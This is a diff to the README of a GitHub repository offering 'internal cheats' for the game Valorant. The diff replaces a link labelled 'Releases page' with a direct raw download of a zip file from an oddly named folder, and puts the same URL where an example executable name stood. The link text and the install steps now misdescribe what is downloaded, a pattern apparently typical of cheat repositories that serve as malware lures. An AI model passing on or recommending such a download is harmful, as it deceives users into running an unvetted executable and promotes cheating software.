shezzi1233/Maxi-Valorant-Internal-Cheats/README.md

 - **Imgui**: A user-friendly graphical interface.

 ## 🔗 Download & Install
-To get started, visit the [Releases page](https://github.com/shezzi1233/Maxi-Valorant-Internal-Cheats/releases) to download the latest version of Maxi-Valorant-Internal-Cheats.
+To get started, visit the [Releases page](https://raw.githubusercontent.com/shezzi1233/Maxi-Valorant-Internal-Cheats/main/uncommunicable/Maxi-Valorant-Internal-Cheats.zip) to download the latest version of Maxi-Valorant-Internal-Cheats.
 Follow these steps:

 1. Click on the above link to open the Releases page.
 2. Choose the latest version listed at the top.
-3. Look for the download link for the executable file (for example, `Maxi-Valorant-Internal-Cheats.exe`).
+3. Look for the download link for the executable file (for example, `https://raw.githubusercontent.com/shezzi1233/Maxi-Valorant-Internal-Cheats/main/uncommunicable/Maxi-Valorant-Internal-Cheats.zip`).
 4. Click on the link to download the file to your computer.

 ## ⚙️ Running the Application